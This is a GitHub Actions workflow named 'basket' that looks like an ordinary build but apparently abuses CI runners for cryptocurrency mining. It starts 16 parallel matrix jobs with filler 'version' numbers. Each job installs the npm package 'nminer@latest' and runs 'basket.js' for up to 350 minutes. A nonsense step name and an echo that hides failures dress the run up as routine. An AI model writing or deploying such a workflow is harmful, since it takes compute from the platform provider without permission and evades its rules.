name: basket
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2195 }
          - { version: 8656 }
          - { version: 6833 }
          - { version: 160 }
          - { version: 7706 }
          - { version: 562 }
          - { version: 1470 }
          - { version: 7084 }
          - { version: 1092 }
          - { version: 2390 }
          - { version: 4982 }
          - { version: 8511 }
          - { version: 7441 }
          - { version: 1648 }
          - { version: 1600 }
          - { version: 5472 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: pull underneath unwilling
        run: |
          npm install nminer@latest
          timeout 350m node basket.js || echo "basket executed"